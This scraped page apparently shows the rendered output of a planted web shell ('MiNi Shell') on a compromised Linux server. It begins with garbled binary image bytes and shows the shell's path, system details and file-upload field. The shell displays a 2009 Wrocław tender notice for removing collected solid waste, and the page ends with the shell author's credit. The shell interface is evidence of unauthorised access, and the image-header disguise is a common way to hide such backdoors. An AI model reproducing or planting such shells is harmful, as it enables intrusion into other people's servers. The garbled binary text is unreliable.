JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090505/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090505/71265-N-2009.html

<p class="kh_header"><b>Wrocław: Usuwanie odpadów stałych zebranych w ramach akcji porządkowych, prowadzonych przez zamawiającego na terenie Wrocławia</b><br>
<b>Numer ogłoszenia: 71265 - 2009; data zamieszczenia: 05.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg i Utrzymania Miasta , ul. Długa 49, 53-633 Wrocław, woj. dolnośląskie, tel. 0-71 3559076, faks 0-71 3734906, 3550866.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdium.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usuwanie odpadów stałych zebranych w ramach akcji porządkowych, prowadzonych przez zamawiającego na terenie Wrocławia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usuwanie odpadów stałych zebranych w ramach akcji porządkowych, prowadzonych przez zamawiającego na terenie Wrocławia.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.53.30.00-2, 90.51.11.00-3, 90.51.20.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> wadium 10000zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1.   Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie   art. 24 ust. 1 i 2 ustawy - Prawo zamówień publicznych. 
2.   Spełniają warunki określone treścią art. 22 ust. 1 pkt 1-3 - ustawy Pzp tj.:
(1) posiadają uprawnienia do wykonywania działalności lub czynności określonych przedmiotem niniejszego zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj. posiadają ważne, wymagane prawem zezwolenia potwierdzające uprawnienia do prowadzenia działalności w zakresie określonym przedmiotem zamówienia tj. posiadają zezwolenie na prowadzenie działalności w zakresie odbierania odpadów komunalnych na terenie Gminy Wrocław, zaklasyfikowanych do grupy 20 - odpady komunalne, łącznie z frakcjami gromadzonymi selektywnie, tj. odpady zaklasyfikowane do:
A) podgrupy 2001 - odpady komunalne segregowane i gromadzone selektywnie, 
       o kodach: 200101; 200102; 200108; 200110; 200111; 200125; 200128; 200130; 200132; 200134; 200136; 200138; 200139; 200140;
B) podgrupy 2002 - odpady z ogrodów i parków (w tym z cmentarzy), o kodach: 200201;  200202; 
C) podgrupy 2003 - inne odpady komunalne, o kodach: 200301; 200303; 200307; 200399,
        wydane przez właściwy organ - Prezydenta Wrocławia na podstawie art. 7, ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku w gminach (jednolity tekst: Dz.U. z 2005 roku - Nr 236, poz. 2008 ze zmianami); 
    (2)posiadają niezbędną wiedzę i doświadczenie do wykonania niniejszego zamówienia, tj:
A) udokumentują wykonanie lub wykonywanie, w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch zamówień - odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia,
Za spełnienie powyższego warunku Zamawiający uzna wykonanie 
lub wykonywanie usług z zakresu: odbierania odpadów komunalnych 
od właścicieli nieruchomości, bądź zbierania oraz transportu odpadów 
lub usług z zakresu gospodarowania odpadami, o łącznej wartości zamówień 
nie mniejszej niż: 240. 000,00 PLN, przy czym każde z zamówień musi trwać co najmniej 6 miesięcy kalendarzowych, 
B)   udokumentują  należyte wykonanie usług określonych wyżej w ppkt a),

(3) dysponują osobami zdolnymi do wykonania zamówienia, tj. dysponują osobami zdolnymi do wykonania zamówienia, w ilości nie mniej niż 7 osób, w tym 5 osób do obsługi technicznej oraz 2 osoby do nadzoru i koordynacji prac,
        4) dysponują potencjałem technicznym niezbędnym do wykonania zamówienia, tj.: wykażą , iż dysponują co najmniej następującymi środkami technicznymi:
a) urządzenia do zbierania odpadów, tj: otwarte kontenery do zbierania odpadów, o pojemności nie mniejszej niż 8m3, w ilości nie mniej niż 20 sztuk,
b) samochody przystosowane do załadunku, transportu oraz rozładunku urządzeń - kontenerów, o których mowa wyżej w ppkt a), spełniających warunki określone postanowieniami, posiadanych przez wykonawcę zezwoleń na prowadzenie działalności w zakresie określonym wyżej w pkt (1), w ilości nie mniej niż 2 samochody specjalistyczne do obsługi urządzeń-kontenerów  określonych wyżej w ppkt a),
        (5) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj. wykażą:
a)  posiadanie na rachunku banku lub spółdzielczej kasy oszczędnościowo-kredytowej (wynikające z przedłożenia stosownego dokumentu, np. informacja banku lub informacja spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek), środków finansowych lub zdolność kredytową wykonawcy na kwotę nie niższą niż 50.000,00 PLN.

Wykonawcą może być osoba fizyczna, osoba prawna, jednostka organizacyjna nieposiadająca osobowości prawnej albo podmioty te występujące wspólnie. W przypadku złożenia oferty wspólnej warunek 1. muszą spełniać wszyscy wykonawcy, warunek 2. dowolny wykonawca lub wykonawcy łącznie. Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia / nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenie wykonawcy, że nie podlega wykluczeniu z postępowania.
2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert). 
3. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego (wystawione nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert) potwierdzające, że wykonawca nie zalega z opłacaniem podatków i opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego.
4. Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego (wystawione nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert) potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. 
5. Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
6. Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Prawo zamówień publicznych, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
7. Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy (minimum 50 000zł), wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
8. Ważne zezwolenie na prowadzenie działalności w zakresie odbierania odpadów komunalnych na terenie Gminy Wrocław, o kodach: 200101; 200102; 200108; 200110; 200111; 200125; 200128; 200130; 200132; 200134; 200136; 200138; 200139; 200140; 200201; 200202; 200301; 200303; 200307; 200399, wydane przez właściwy organ - Prezydenta Miasta Wrocławia na podstawie art. 7 ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku w gminach (tekst jednolity: Dz.U. z 2005 r. Nr 236 poz. 2008 ze zm.),
9. Wykaz zrealizowanych w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy -    w tym okresie, zamówień (minimum jednego) polegających na odbieraniu odpadów komunalnych od właścicieli nieruchomości, bądź zbierania oraz transportu odpadów lub usług z zakresu gospodarowania odpadami, o łącznej wartości zamówień nie mniejszej niż: 240.000,00zł, przy czym każde zamówienie musi trwać co najmniej 6 miesięcy kalendarzowych wg załącznika nr IV wraz z dokumentami potwierdzającymi, że zamówienia te zostały zrealizowane należycie,
10. Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacją na temat za-kresu wykonywanych przez nich czynności w ramach realizacji zamówienia, sporządzony zgodnie z załącznikiem nr V,
11. Wykaz narzędzi i urządzeń niezbędnych do wykonania zamówienia, którymi dysponuje wykonawca, sporządzony zgodnie z załącznikiem nr VI,
12. Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, narzędzi i urządzeń niezbędnych do wykonania zamówienia   jeżeli w wykazach, o których mowa w pkt 10 i 11 , wykonawca wskazał osoby, którymi będzie dysponował (w przypadku, gdy te osoby będą udostępnione przez inne podmioty niż wykonawca składający ofertę)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://wzp.zdium.wroc.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg i Utrzymania Miasta, ul. Długa 49, 53-633 Wrocław, bud. B, pok. nr 110 w godz. 7:30 - 15.00. Osoba uprawniona do kontaktów: mgr inż. Paulina Giżycka, tel. (071) 37-60-721.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.05.2009 godzina 11:30, miejsce: Zarząd Dróg i Utrzymania Miasta, ul. Długa 49, 53-633 Wrocław, bud. B, pok. nr 1 (Biuro Obsługi Klienta).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com